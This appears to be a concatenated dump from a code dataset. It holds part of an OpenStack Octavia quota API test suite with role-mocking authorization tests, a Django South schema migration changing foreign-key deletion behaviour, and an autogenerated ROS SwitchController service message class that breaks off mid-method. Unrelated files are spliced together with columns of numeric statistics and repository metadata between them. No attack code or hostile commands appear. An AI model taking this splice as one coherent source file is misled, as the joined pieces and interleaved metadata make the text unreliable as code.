quotas_desc = response.json.get(self.root_tag_list)
response = self.get(self.QUOTAS_PATH,
params={'sort': 'load_balancer:asc'})
quotas_asc = response.json.get(self.root_tag_list)
self.assertEqual(3, len(quotas_desc))
self.assertEqual(3, len(quotas_asc))
quota_lb_member_desc = [(l.get('load_balancer'), l.get('member'))
for l in quotas_desc]
quota_lb_member_asc = [(l.get('load_balancer'), l.get('member'))
for l in quotas_asc]
self.assertEqual(quota_lb_member_asc,
list(reversed(quota_lb_member_desc)))
def test_get_all_limited(self):
self.skipTest("No idea how this should work yet")
# TODO(rm_work): Figure out how to make this ... work
project1_id = uuidutils.generate_uuid()
project2_id = uuidutils.generate_uuid()
project3_id = uuidutils.generate_uuid()
self.create_quota(
project_id=project1_id, lb_quota=3, member_quota=8
).get(self.root_tag)
self.create_quota(
project_id=project2_id, lb_quota=2, member_quota=10
).get(self.root_tag)
self.create_quota(
project_id=project3_id, lb_quota=1, member_quota=9
).get(self.root_tag)
# First two -- should have 'next' link
first_two = self.get(self.QUOTAS_PATH, params={'limit': 2}).json
objs = first_two[self.root_tag_list]
links = first_two[self.root_tag_links]
self.assertEqual(2, len(objs))
self.assertEqual(1, len(links))
self.assertEqual('next', links[0]['rel'])
# Third + off the end -- should have previous link
third = self.get(self.QUOTAS_PATH, params={
'limit': 2,
'marker': first_two[self.root_tag_list][1]['id']}).json
objs = third[self.root_tag_list]
links = third[self.root_tag_links]
self.assertEqual(1, len(objs))
self.assertEqual(1, len(links))
self.assertEqual('previous', links[0]['rel'])
# Middle -- should have both links
middle = self.get(self.QUOTAS_PATH, params={
'limit': 1,
'marker': first_two[self.root_tag_list][0]['id']}).json
objs = middle[self.root_tag_list]
links = middle[self.root_tag_links]
self.assertEqual(1, len(objs))
self.assertEqual(2, len(links))
self.assertItemsEqual(['previous', 'next'], [l['rel'] for l in links])
def test_get_default_quotas(self):
response = self.get(self.QUOTA_DEFAULT_PATH.format(
project_id=self.project_id))
quota_dict = response.json
self._assert_quotas_equal(quota_dict['quota'])
def test_get_default_quotas_Authorized(self):
self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF))
auth_strategy = self.conf.conf.api_settings.get('auth_strategy')
self.conf.config(group='api_settings', auth_strategy=constants.TESTING)
with mock.patch.object(octavia.common.context.Context, 'project_id',
self.project_id):
override_credentials = {
'service_user_id': None,
'user_domain_id': None,
'is_admin_project': True,
'service_project_domain_id': None,
'service_project_id': None,
'roles': ['load-balancer_member'],
'user_id': None,
'is_admin': False,
'service_user_domain_id': None,
'project_domain_id': None,
'service_roles': [],
'project_id': self.project_id}
with mock.patch(
"oslo_context.context.RequestContext.to_policy_values",
return_value=override_credentials):
response = self.get(self.QUOTA_DEFAULT_PATH.format(
project_id=self.project_id))
quota_dict = response.json
self._assert_quotas_equal(quota_dict['quota'])
self.conf.config(group='api_settings', auth_strategy=auth_strategy)
def test_get_default_quotas_not_Authorized(self):
self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF))
auth_strategy = self.conf.conf.api_settings.get('auth_strategy')
self.conf.config(group='api_settings', auth_strategy=constants.TESTING)
with mock.patch.object(octavia.common.context.Context, 'project_id',
uuidutils.generate_uuid()):
response = self.get(self.QUOTA_DEFAULT_PATH.format(
project_id=self.project_id), status=403)
self.assertEqual(self.NOT_AUTHORIZED_BODY, response.json)
self.conf.config(group='api_settings', auth_strategy=auth_strategy)
def test_custom_quotas(self):
quota_path = self.QUOTA_PATH.format(project_id=self.project_id)
body = {'quota': {'load_balancer': 30, 'listener': 30, 'pool': 30,
'health_monitor': 30, 'member': 30}}
self.put(quota_path, body, status=202)
response = self.get(quota_path)
quota_dict = response.json
self._assert_quotas_equal(quota_dict['quota'], expected=body['quota'])
def test_custom_quotas_quota_admin(self):
quota_path = self.QUOTA_PATH.format(project_id=self.project_id)
body = {'quota': {'load_balancer': 30, 'listener': 30, 'pool': 30,
'health_monitor': 30, 'member': 30}}
self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF))
auth_strategy = self.conf.conf.api_settings.get('auth_strategy')
self.conf.config(group='api_settings', auth_strategy=constants.TESTING)
with mock.patch.object(octavia.common.context.Context, 'project_id',
self.project_id):
override_credentials = {
'service_user_id': None,
'user_domain_id': None,
'is_admin_project': True,
'service_project_domain_id': None,
'service_project_id': None,
'roles': ['load-balancer_quota_admin'],
'user_id': None,
'is_admin': False,
'service_user_domain_id': None,
'project_domain_id': None,
'service_roles': [],
'project_id': self.project_id}
with mock.patch(
"oslo_context.context.RequestContext.to_policy_values",
return_value=override_credentials):
self.put(quota_path, body, status=202)
self.conf.config(group='api_settings', auth_strategy=auth_strategy)
response = self.get(quota_path)
quota_dict = response.json
self._assert_quotas_equal(quota_dict['quota'], expected=body['quota'])
def test_custom_quotas_not_Authorized_member(self):
quota_path = self.QUOTA_PATH.format(project_id=self.project_id)
body = {'quota': {'load_balancer': 30, 'listener': 30, 'pool': 30,
'health_monitor': 30, 'member': 30}}
self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF))
auth_strategy = self.conf.conf.api_settings.get('auth_strategy')
self.conf.config(group='api_settings', auth_strategy=constants.TESTING)
with mock.patch.object(octavia.common.context.Context, 'project_id',
self.project_id):
override_credentials = {
'service_user_id': None,
'user_domain_id': None,
'is_admin_project': True,
'service_project_domain_id': None,
'service_project_id': None,
'roles': ['load-balancer_member'],
'user_id': None,
'is_admin': False,
'service_user_domain_id': None,
'project_domain_id': None,
'service_roles': [],
'project_id': self.project_id}
with mock.patch(
"oslo_context.context.RequestContext.to_policy_values",
return_value=override_credentials):
response = self.put(quota_path, body, status=403)
self.conf.config(group='api_settings', auth_strategy=auth_strategy)
self.assertEqual(self.NOT_AUTHORIZED_BODY, response.json)
def test_custom_partial_quotas(self):
quota_path = self.QUOTA_PATH.format(project_id=self.project_id)
body = {'quota': {'load_balancer': 30, 'listener': None, 'pool': 30,
'health_monitor': 30, 'member': 30}}
expected_body = {'quota': {
'load_balancer': 30,
'listener': CONF.quotas.default_listener_quota, 'pool': 30,
'health_monitor': 30, 'member': 30}}
self.put(quota_path, body, status=202)
response = self.get(quota_path)
quota_dict = response.json
self._assert_quotas_equal(quota_dict['quota'],
expected=expected_body['quota'])
def test_custom_missing_quotas(self):
quota_path = self.QUOTA_PATH.format(project_id=self.project_id)
body = {'quota': {'load_balancer': 30, 'pool': 30,
'health_monitor': 30, 'member': 30}}
expected_body = {'quota': {
'load_balancer': 30,
'listener': CONF.quotas.default_listener_quota, 'pool': 30,
'health_monitor': 30, 'member': 30}}
self.put(quota_path, body, status=202)
response = self.get(quota_path)
quota_dict = response.json
self._assert_quotas_equal(quota_dict['quota'],
expected=expected_body['quota'])
def test_delete_custom_quotas(self):
quota_path = self.QUOTA_PATH.format(project_id=self.project_id)
body = {'quota': {'load_balancer': 30, 'listener': 30, 'pool': 30,
'health_monitor': 30, 'member': 30}}
self.put(quota_path, body, status=202)
response = self.get(quota_path)
quota_dict = response.json
self._assert_quotas_equal(quota_dict['quota'], expected=body['quota'])
self.delete(quota_path, status=202)
response = self.get(quota_path)
quota_dict = response.json
self._assert_quotas_equal(quota_dict['quota'])
def test_delete_custom_quotas_admin(self):
quota_path = self.QUOTA_PATH.format(project_id=self.project_id)
body = {'quota': {'load_balancer': 30, 'listener': 30, 'pool': 30,
'health_monitor': 30, 'member': 30}}
self.put(quota_path, body, status=202)
response = self.get(quota_path)
quota_dict = response.json
self._assert_quotas_equal(quota_dict['quota'], expected=body['quota'])
self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF))
auth_strategy = self.conf.conf.api_settings.get('auth_strategy')
self.conf.config(group='api_settings', auth_strategy=constants.TESTING)
with mock.patch.object(octavia.common.context.Context, 'project_id',
self.project_id):
override_credentials = {
'service_user_id': None,
'user_domain_id': None,
'is_admin_project': True,
'service_project_domain_id': None,
'service_project_id': None,
'roles': ['load-balancer_quota_admin'],
'user_id': None,
'is_admin': False,
'service_user_domain_id': None,
'project_domain_id': None,
'service_roles': [],
'project_id': self.project_id}
with mock.patch(
"oslo_context.context.RequestContext.to_policy_values",
return_value=override_credentials):
self.delete(quota_path, status=202)
self.conf.config(group='api_settings', auth_strategy=auth_strategy)
response = self.get(quota_path)
quota_dict = response.json
self._assert_quotas_equal(quota_dict['quota'])
def test_delete_quotas_not_Authorized_member(self):
quota_path = self.QUOTA_PATH.format(project_id=self.project_id)
body = {'quota': {'load_balancer': 30, 'listener': 30, 'pool': 30,
'health_monitor': 30, 'member': 30}}
self.put(quota_path, body, status=202)
response = self.get(quota_path)
quota_dict = response.json
self._assert_quotas_equal(quota_dict['quota'], expected=body['quota'])
self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF))
auth_strategy = self.conf.conf.api_settings.get('auth_strategy')
self.conf.config(group='api_settings', auth_strategy=constants.TESTING)
with mock.patch.object(octavia.common.context.Context, 'project_id',
self.project_id):
override_credentials = {
'service_user_id': None,
'user_domain_id': None,
'is_admin_project': True,
'service_project_domain_id': None,
'service_project_id': None,
'roles': ['load-balancer_member'],
'user_id': None,
'is_admin': False,
'service_user_domain_id': None,
'project_domain_id': None,
'service_roles': [],
'project_id': self.project_id}
with mock.patch(
"oslo_context.context.RequestContext.to_policy_values",
return_value=override_credentials):
self.delete(quota_path, status=403)
self.conf.config(group='api_settings', auth_strategy=auth_strategy)
response = self.get(quota_path)
quota_dict = response.json
self._assert_quotas_equal(quota_dict['quota'], expected=body['quota'])
def test_delete_non_existent_custom_quotas(self):
quota_path = self.QUOTA_PATH.format(project_id='bogus')
self.delete(quota_path, status=404)
| 47.339751
| 79
| 0.604675
| 4,762
| 41,801
| 5.00273
| 0.050819
| 0.049868
| 0.028208
| 0.021744
| 0.905847
| 0.884901
| 0.875624
| 0.859841
| 0.848802
| 0.844142
| 0
| 0.019113
| 0.285304
| 41,801
| 882
| 80
| 47.393424
| 0.77831
| 0.02122
| 0
| 0.83584
| 0
| 0
| 0.15404
| 0.038834
| 0
| 0
| 0
| 0.001134
| 0.075188
| 1
| 0.045113
| false
| 0
| 0.010025
| 0
| 0.06015
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7c89389f87ae0c9ff5d1c1d7659494937cb20dbc
| 10,939
|
py
|
Python
|
dbaas/physical/migrations/0017_auto__chg_field_environment_equivalent_environment__chg_field_instance.py
|
didindinn/database-as-a-service
|
747de31ff8546f7874ddd654af860e130afd17a0
|
[
"BSD-3-Clause"
] | 303
|
2015-01-08T10:35:54.000Z
|
2022-02-28T08:54:06.000Z
|
dbaas/physical/migrations/0017_auto__chg_field_environment_equivalent_environment__chg_field_instance.py
|
nouraellm/database-as-a-service
|
5e655c9347bea991b7218a01549f5e44f161d7be
|
[
"BSD-3-Clause"
] | 124
|
2015-01-14T12:56:15.000Z
|
2022-03-22T20:45:11.000Z
|
dbaas/physical/migrations/0017_auto__chg_field_environment_equivalent_environment__chg_field_instance.py
|
nouraellm/database-as-a-service
|
5e655c9347bea991b7218a01549f5e44f161d7be
|
[
"BSD-3-Clause"
] | 110
|
2015-01-02T11:59:48.000Z
|
2022-02-28T08:54:06.000Z
|
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Changing field 'Environment.equivalent_environment'
db.alter_column(u'physical_environment', 'equivalent_environment_id', self.gf(
'django.db.models.fields.related.ForeignKey')(to=orm['physical.Environment'], null=True, on_delete=models.SET_NULL))
# Changing field 'Instance.future_instance'
db.alter_column(u'physical_instance', 'future_instance_id', self.gf(
'django.db.models.fields.related.ForeignKey')(to=orm['physical.Instance'], null=True, on_delete=models.SET_NULL))
# Changing field 'Host.future_host'
db.alter_column(u'physical_host', 'future_host_id', self.gf('django.db.models.fields.related.ForeignKey')(
to=orm['physical.Host'], null=True, on_delete=models.SET_NULL))
# Changing field 'Plan.equivalent_plan'
db.alter_column(u'physical_plan', 'equivalent_plan_id', self.gf(
'django.db.models.fields.related.ForeignKey')(to=orm['physical.Plan'], null=True, on_delete=models.SET_NULL))
def backwards(self, orm):
# Changing field 'Environment.equivalent_environment'
db.alter_column(u'physical_environment', 'equivalent_environment_id', self.gf(
'django.db.models.fields.related.ForeignKey')(to=orm['physical.Environment'], null=True))
# Changing field 'Instance.future_instance'
db.alter_column(u'physical_instance', 'future_instance_id', self.gf(
'django.db.models.fields.related.ForeignKey')(to=orm['physical.Instance'], null=True))
# Changing field 'Host.future_host'
db.alter_column(u'physical_host', 'future_host_id', self.gf(
'django.db.models.fields.related.ForeignKey')(to=orm['physical.Host'], null=True))
# Changing field 'Plan.equivalent_plan'
db.alter_column(u'physical_plan', 'equivalent_plan_id', self.gf(
'django.db.models.fields.related.ForeignKey')(to=orm['physical.Plan'], null=True))
models = {
u'physical.databaseinfra': {
'Meta': {'object_name': 'DatabaseInfra'},
'capacity': ('django.db.models.fields.PositiveIntegerField', [], {'default': '1'}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'endpoint': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'endpoint_dns': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'engine': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'databaseinfras'", 'on_delete': 'models.PROTECT', 'to': u"orm['physical.Engine']"}),
'environment': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'databaseinfras'", 'on_delete': 'models.PROTECT', 'to': u"orm['physical.Environment']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '100'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '406', 'blank': 'True'}),
'per_database_size_mbytes': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'plan': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'databaseinfras'", 'on_delete': 'models.PROTECT', 'to': u"orm['physical.Plan']"}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'})
},
u'physical.engine': {
'Meta': {'unique_together': "((u'version', u'engine_type'),)", 'object_name': 'Engine'},
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'engine_type': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'engines'", 'on_delete': 'models.PROTECT', 'to': u"orm['physical.EngineType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'path': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'template_name': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'user_data_script': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'version': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'physical.enginetype': {
'Meta': {'object_name': 'EngineType'},
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '100'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
u'physical.environment': {
'Meta': {'object_name': 'Environment'},
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'equivalent_environment': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['physical.Environment']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '100'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
u'physical.host': {
'Meta': {'object_name': 'Host'},
'address': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'future_host': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['physical.Host']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'hostname': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'monitor_url': ('django.db.models.fields.URLField', [], {'max_length': '500', 'null': 'True', 'blank': 'True'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
u'physical.instance': {
'Meta': {'unique_together': "((u'address', u'port'),)", 'object_name': 'Instance'},
'address': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'databaseinfra': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'instances'", 'to': u"orm['physical.DatabaseInfra']"}),
'dns': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'future_instance': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['physical.Instance']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'hostname': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['physical.Host']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'instance_type': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_arbiter': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'port': ('django.db.models.fields.IntegerField', [], {}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '2'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
u'physical.plan': {
'Meta': {'object_name': 'Plan'},
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'engine_type': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'plans'", 'to': u"orm['physical.EngineType']"}),
'environments': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['physical.Environment']", 'symmetrical': 'False'}),
'equivalent_plan': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['physical.Plan']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_default': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_ha': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'max_db_size': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '100'}),
'provider': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
u'physical.planattribute': {
'Meta': {'object_name': 'PlanAttribute'},
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'plan': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'plan_attributes'", 'to': u"orm['physical.Plan']"}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '200'})
}
}
complete_apps = ['physical']
| 76.496503
| 194
| 0.593107
| 1,205
| 10,939
| 5.243983
| 0.100415
| 0.09875
| 0.170597
| 0.243709
| 0.844121
| 0.822124
| 0.815952
| 0.759614
| 0.71198
| 0.678272
| 0
| 0.00689
| 0.177347
| 10,939
| 142
| 195
| 77.035211
| 0.695299
| 0.03227
| 0
| 0.302521
| 0
| 0
| 0.572144
| 0.301626
| 0
| 0
| 0
| 0
| 0
| 1
| 0.016807
| false
| 0.008403
| 0.033613
| 0
| 0.07563
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7c972a6643a15644f2fc9c32e428bf404091a55c
| 12,906
|
py
|
Python
|
melodic/lib/python2.7/dist-packages/controller_manager_msgs/srv/_SwitchController.py
|
Dieptranivsr/Ros_Diep
|
d790e75e6f5da916701b11a2fdf3e03b6a47086b
|
[
"MIT"
] | null | null | null |
melodic/lib/python2.7/dist-packages/controller_manager_msgs/srv/_SwitchController.py
|
Dieptranivsr/Ros_Diep
|
d790e75e6f5da916701b11a2fdf3e03b6a47086b
|
[
"MIT"
] | 1
|
2021-07-08T10:26:06.000Z
|
2021-07-08T10:31:11.000Z
|
melodic/lib/python2.7/dist-packages/controller_manager_msgs/srv/_SwitchController.py
|
Dieptranivsr/Ros_Diep
|
d790e75e6f5da916701b11a2fdf3e03b6a47086b
|
[
"MIT"
] | null | null | null |
# This Python file uses the following encoding: utf-8
"""autogenerated by genpy from controller_manager_msgs/SwitchControllerRequest.msg. Do not edit."""
import codecs
import sys
python3 = True if sys.hexversion > 0x03000000 else False
import genpy
import struct
class SwitchControllerRequest(genpy.Message):
_md5sum = "36d99a977432b71d4bf16ce5847949d7"
_type = "controller_manager_msgs/SwitchControllerRequest"
_has_header = False # flag to mark the presence of a Header object
_full_text = """# The SwitchController service allows you stop a number of controllers
# and start a number of controllers, all in one single timestep of the
# controller_manager control loop.
# To switch controllers, specify
# * the list of controller names to start,
# * the list of controller names to stop, and
# * the strictness (BEST_EFFORT or STRICT)
# * STRICT means that switching will fail if anything goes wrong (an invalid
# controller name, a controller that failed to start, etc. )
# * BEST_EFFORT means that even when something goes wrong with on controller,
# the service will still try to start/stop the remaining controllers
# * start the controllers as soon as their hardware dependencies are ready, will
# wait for all interfaces to be ready otherwise
# * the timeout in seconds before aborting pending controllers. Zero for infinite
# The return value "ok" indicates if the controllers were switched
# successfully or not. The meaning of success depends on the
# specified strictness.
string[] start_controllers
string[] stop_controllers
int32 strictness
int32 BEST_EFFORT=1
int32 STRICT=2
bool start_asap
float64 timeout
"""
# Pseudo-constants
BEST_EFFORT = 1
STRICT = 2
__slots__ = ['start_controllers','stop_controllers','strictness','start_asap','timeout']
_slot_types = ['string[]','string[]','int32','bool','float64']
def __init__(self, *args, **kwds):
"""
Constructor. Any message fields that are implicitly/explicitly
set to None will be assigned a default value. The recommend
use is keyword arguments as this is more robust to future message
changes. You cannot mix in-order arguments and keyword arguments.
The available fields are:
start_controllers,stop_controllers,strictness,start_asap,timeout
:param args: complete set of field values, in .msg order
:param kwds: use keyword arguments corresponding to message field names
to set specific fields.
"""
if args or kwds:
super(SwitchControllerRequest, self).__init__(*args, **kwds)
# message fields cannot be None, assign default values for those that are
if self.start_controllers is None:
self.start_controllers = []
if self.stop_controllers is None:
self.stop_controllers = []
if self.strictness is None:
self.strictness = 0
if self.start_asap is None:
self.start_asap = False
if self.timeout is None:
self.timeout = 0.
else:
self.start_controllers = []
self.stop_controllers = []
self.strictness = 0
self.start_asap = False
self.timeout = 0.
def _get_types(self):
"""
internal API method
"""
return self._slot_types
def serialize(self, buff):
"""
serialize message into buffer
:param buff: buffer, ``StringIO``
"""
try:
length = len(self.start_controllers)
buff.write(_struct_I.pack(length))
for val1 in self.start_controllers:
length = len(val1)
if python3 or type(val1) == unicode:
val1 = val1.encode('utf-8')
length = len(val1)
buff.write(struct.Struct('<I%ss'%length).pack(length, val1))
length = len(self.stop_controllers)
buff.write(_struct_I.pack(length))
for val1 in self.stop_controllers:
length = len(val1)
if python3 or type(val1) == unicode:
val1 = val1.encode('utf-8')
length = len(val1)
buff.write(struct.Struct('<I%ss'%length).pack(length, val1))
_x = self
buff.write(_get_struct_iBd().pack(_x.strictness, _x.start_asap, _x.timeout))
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize(self, str):
"""
unpack serialized message in str into this message instance
:param str: byte array of serialized message, ``str``
"""
codecs.lookup_error("rosmsg").msg_type = self._type
try:
end = 0
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.start_controllers = []
for i in range(0, length):
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1 = str[start:end].decode('utf-8', 'rosmsg')
else:
val1 = str[start:end]
self.start_controllers.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.stop_controllers = []
for i in range(0, length):
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1 = str[start:end].decode('utf-8', 'rosmsg')
else:
val1 = str[start:end]
self.stop_controllers.append(val1)
_x = self
start = end
end += 13
(_x.strictness, _x.start_asap, _x.timeout,) = _get_struct_iBd().unpack(str[start:end])
self.start_asap = bool(self.start_asap)
return self
except struct.error as e:
raise genpy.DeserializationError(e) # most likely buffer underfill
def serialize_numpy(self, buff, numpy):
"""
serialize message with numpy array types into buffer
:param buff: buffer, ``StringIO``
:param numpy: numpy python module
"""
try:
length = len(self.start_controllers)
buff.write(_struct_I.pack(length))
for val1 in self.start_controllers:
length = len(val1)
if python3 or type(val1) == unicode:
val1 = val1.encode('utf-8')
length = len(val1)
buff.write(struct.Struct('<I%ss'%length).pack(length, val1))
length = len(self.stop_controllers)
buff.write(_struct_I.pack(length))
for val1 in self.stop_controllers:
length = len(val1)
if python3 or type(val1) == unicode:
val1 = val1.encode('utf-8')
length = len(val1)
buff.write(struct.Struct('<I%ss'%length).pack(length, val1))
_x = self
buff.write(_get_struct_iBd().pack(_x.strictness, _x.start_asap, _x.timeout))
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize_numpy(self, str, numpy):
"""
unpack serialized message in str into this message instance using numpy for array types
:param str: byte array of serialized message, ``str``
:param numpy: numpy python module
"""
codecs.lookup_error("rosmsg").msg_type = self._type
try:
end = 0
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.start_controllers = []
for i in range(0, length):
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1 = str[start:end].decode('utf-8', 'rosmsg')
else:
val1 = str[start:end]
self.start_controllers.append(val1)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
self.stop_controllers = []
for i in range(0, length):
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
val1 = str[start:end].decode('utf-8', 'rosmsg')
else:
val1 = str[start:end]
self.stop_controllers.append(val1)
_x = self
start = end
end += 13
(_x.strictness, _x.start_asap, _x.timeout,) = _get_struct_iBd().unpack(str[start:end])
self.start_asap = bool(self.start_asap)
return self
except struct.error as e:
raise genpy.DeserializationError(e) # most likely buffer underfill
_struct_I = genpy.struct_I
def _get_struct_I():
global _struct_I
return _struct_I
_struct_iBd = None
def _get_struct_iBd():
global _struct_iBd
if _struct_iBd is None:
_struct_iBd = struct.Struct("<iBd")
return _struct_iBd
# This Python file uses the following encoding: utf-8
"""autogenerated by genpy from controller_manager_msgs/SwitchControllerResponse.msg. Do not edit."""
import codecs
import sys
python3 = True if sys.hexversion > 0x03000000 else False
import genpy
import struct
class SwitchControllerResponse(genpy.Message):
_md5sum = "6f6da3883749771fac40d6deb24a8c02"
_type = "controller_manager_msgs/SwitchControllerResponse"
_has_header = False # flag to mark the presence of a Header object
_full_text = """bool ok
"""
__slots__ = ['ok']
_slot_types = ['bool']
def __init__(self, *args, **kwds):
"""
Constructor. Any message fields that are implicitly/explicitly
set to None will be assigned a default value. The recommend
use is keyword arguments as this is more robust to future message
changes. You cannot mix in-order arguments and keyword arguments.
The available fields are:
ok
:param args: complete set of field values, in .msg order
:param kwds: use keyword arguments corresponding to message field names
to set specific fields.
"""
if args or kwds:
super(SwitchControllerResponse, self).__init__(*args, **kwds)
# message fields cannot be None, assign default values for those that are
if self.ok is None:
self.ok = False
else:
self.ok = False
def _get_types(self):
"""
internal API method
"""
return self._slot_types
def serialize(self, buff):
"""
serialize message into buffer
:param buff: buffer, ``StringIO``
"""
try:
_x = self.ok
buff.write(_get_struct_B().pack(_x))
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize(self, str):
"""
unpack serialized message in str into this message instance
:param str: byte array of serialized message, ``str``
"""
codecs.lookup_error("rosmsg").msg_type = self._type
try:
end = 0
start = end
end += 1
